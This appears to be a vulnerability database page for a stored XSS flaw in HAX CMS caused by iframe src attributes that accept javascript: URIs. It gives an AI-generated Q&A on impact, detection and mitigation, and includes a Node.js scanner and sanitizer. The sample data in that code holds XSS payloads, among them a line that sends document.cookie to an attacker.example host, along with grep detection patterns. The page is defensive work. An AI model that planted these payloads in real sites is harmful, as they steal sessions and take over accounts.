CVE-2026-46396
Deferred - Pending Action
Stored XSS in HAX CMS Prior to Version 26.0.0

Publication date: 2026-06-05

Last updated on: 2026-06-05

Assigner: GitHub, Inc.

Description
HAX CMS helps manage a microsite universe with PHP or Node.js backends. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 26.0.0 due to improper sanitization of `<iframe>` elements. The application allows `javascript:` URIs in the `src` attribute, and the browser executes them when a page carrying such an iframe is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim's browser and access sensitive data exposed to client-side scripts. Version 26.0.0 fixes the issue.
Meta Information
Published
2026-06-05
Last Modified
2026-06-05
Generated
2026-06-06
AI Q&A
2026-06-05
EPSS Evaluated
N/A
Affected Vendors & Products
Showing 4 associated CPEs

Vendor      Product        Version / Range
haxtheweb   haxcms         all versions before 26.0.0
haxtheweb   iframe_loader  all versions before 26.0.0
haxtheweb   video_player   all versions before 26.0.0
haxtheweb   haxcms_php     all versions before 26.0.0
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-46396 is a stored cross-site scripting (XSS) vulnerability in HAX CMS that occurs due to improper sanitization of <iframe> elements. Specifically, the application accepts javascript: URIs in the src attribute of iframes stored in page content. When a browser renders such a page it navigates the frame to the javascript: URL and evaluates the script; because the frame starts as about:blank and inherits the embedding page's origin, the script runs with the same origin as the HAX CMS site.

This flaw enables an attacker who can get content stored in the site to inject JavaScript that executes in the browser of every user who views the affected page.


How can this vulnerability impact me?

Exploitation allows attackers to run arbitrary script in a victim's browser with the origin of the HAX CMS site, which exposes whatever client-side script can reach: authentication tokens held in localStorage or sessionStorage, cookies not flagged HttpOnly, application configuration, and any API the victim is authorized to call. Cookies marked HttpOnly cannot be read directly, but the injected script can still issue authenticated requests on the victim's behalf, so the practical outcomes are the same:

  • Full account takeover
  • Session hijacking
  • Unauthorized actions performed on behalf of the victim

How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection has two parts: confirming whether the installed HAX CMS and its web components are older than 26.0.0, and checking stored content for iframe elements whose src already carries a javascript: URL.

The affected CPEs cover the iframe-loader and video-player web components as well as the haxcms (Node.js) and haxcms-php backends, so check the versions of all of them; a patched backend serving unpatched components is still exposed.

  • For npm-based installations, run from the project directory: npm list @haxtheweb/haxcms-nodejs @haxtheweb/iframe-loader @haxtheweb/video-player
  • For PHP-based installations, identify which haxcms-php release (git tag or release archive) is deployed and compare it with 26.0.0.

To find content that has already been injected, search stored pages and database exports for iframe tags whose src begins with javascript:. Quote the pattern carefully: a single-quoted pattern with an escaped apostrophe inside it is not valid shell and will leave the quote unterminated.

  • Example command (case-insensitive, accepting either quote style and leading whitespace): grep -rniE "<iframe[^>]*src=[\"']?[[:space:]]*javascript:" /path/to/haxcms/content
  • A literal match misses encoded or split variants that the browser still resolves to the javascript: scheme (for example &#106;avascript: or java&Tab;script:), so treat a clean grep as necessary but not sufficient, and prefer a check that decodes HTML entities and strips whitespace before comparing the scheme.
  • Monitor web traffic and content-save requests for payloads that embed iframe elements with javascript: URIs.

What immediate steps should I take to mitigate this vulnerability?

The primary mitigation is to upgrade HAX CMS and the affected web components (iframe-loader and video-player) to version 26.0.0 or later, where the issue is fixed.

Until the upgrade can be performed, remove iframe elements in stored content whose src resolves to a javascript: URL. Match on the URL scheme after decoding HTML entities, stripping leading whitespace and ignoring case, not on the literal string javascript:, since the browser accepts those variants too.

Additionally, restrict which users may author iframe elements, and deploy a Content Security Policy whose script-src directive omits 'unsafe-inline': browsers treat navigation to a javascript: URL as inline script execution and block it under such a policy. This is defence in depth, not a replacement for the upgrade, because the stored payload remains in the content.

Monitor logs and user activity for signs of exploitation such as unexpected script execution or account hijacking attempts.
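The detection and interim mitigation described above, as an added example that is not part of this page or of the HAX CMS project: a Node.js script in which scanContent reports iframe elements whose src resolves to the javascript: scheme after decoding HTML entities and stripping the whitespace a browser's URL parser ignores (the variants a literal grep misses), and sanitizeIframes is the hardened form of the check, keeping an iframe only when its src parses as an https URL on an allowlisted host. The sample page, the host allowlist and all function names are constructed for this example; HAX CMS's real storage layout and sanitizer are not shown.

```javascript
// Added example: scan stored HTML for <iframe src="javascript:..."> and apply an
// allowlist-based sanitizer. Not HAX CMS code; names and sample data are constructed.

// Named character references an attacker may use to split or disguise a scheme;
// numeric references (&#106; &#x6A;) are decoded generically below.
const NAMED_ENTITIES = {
  amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
  colon: ":", Tab: "\t", NewLine: "\n", nbsp: "\u00a0",
};

// Decode character references the way an HTML parser does for attribute values.
function decodeEntities(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body) ? NAMED_ENTITIES[body] : match;
  });
}

// Scheme of a raw src attribute as the browser's URL parser would see it:
// entities decoded, leading/trailing C0 controls and spaces trimmed,
// tab/CR/LF removed anywhere, scheme compared case-insensitively.
// Returns null for relative or scheme-less URLs.
function urlScheme(rawSrc) {
  const s = decodeEntities(rawSrc)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// An iframe open tag with its optional body and close tag, and its src attribute.
const IFRAME_RE = /<iframe\b([^>]*)>(?:[\s\S]*?<\/iframe\s*>)?/gi;
const SRC_RE = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

function srcOf(attrs) {
  const m = SRC_RE.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Detection: every iframe whose src resolves to the javascript: scheme.
function scanContent(html) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const src = srcOf(m[1]);
    if (src !== null && urlScheme(src) === "javascript") {
      findings.push({ offset: m.index, src, element: m[0] });
    }
  }
  return findings;
}

// Hardened form: keep an iframe only if its src parses as an absolute https URL
// on an allowlisted host; javascript:, data:, relative and malformed URLs are dropped.
function sanitizeIframes(html, allowedHosts) {
  return html.replace(IFRAME_RE, (element, attrs) => {
    const src = srcOf(attrs);
    if (src === null) return "";
    let url;
    try { url = new URL(decodeEntities(src)); } catch { return ""; }
    return url.protocol === "https:" && allowedHosts.includes(url.hostname) ? element : "";
  });
}

// Constructed sample content: one legitimate embed, four javascript: variants
// a browser would execute, and one relative URL.
const SAMPLE_PAGE = [
  "<h1>Welcome</h1>",
  '<iframe src="https://www.youtube.com/embed/example"></iframe>',
  '<iframe src="javascript:alert(document.cookie)"></iframe>',
  '<iframe src=" JaVaScRiPt:fetch(`https://attacker.example/?c=`+document.cookie) "></iframe>',
  '<iframe src="&#106;avascript:alert(1)"></iframe>',
  '<iframe src="java&Tab;script:alert(2)"></iframe>',
  '<iframe src="/local/page.html"></iframe>',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanContent(SAMPLE_PAGE)) console.log(`offset ${f.offset}: ${f.src}`);
  console.log(sanitizeIframes(SAMPLE_PAGE, ["www.youtube.com"]));
}
```

The sanitizer is deliberately strict: it rejects relative URLs and any scheme other than https, which is the right default for untrusted authors but may need loosening for a site that embeds its own pages. The regexes are adequate for grepping exported content; for a fix inside the application, run the same scheme check from an HTML parser or an established sanitizer rather than from regular expressions.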


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The stored cross-site scripting (XSS) vulnerability in HAX CMS allows attackers to execute arbitrary JavaScript in a victim's browser, potentially accessing sensitive client-side data such as authentication tokens, session cookies, application configurations, and user-specific API data.

This unauthorized access and potential data exposure can lead to violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and breaches.

Therefore, exploitation of this vulnerability could result in non-compliance with these standards due to compromised confidentiality and integrity of sensitive data.

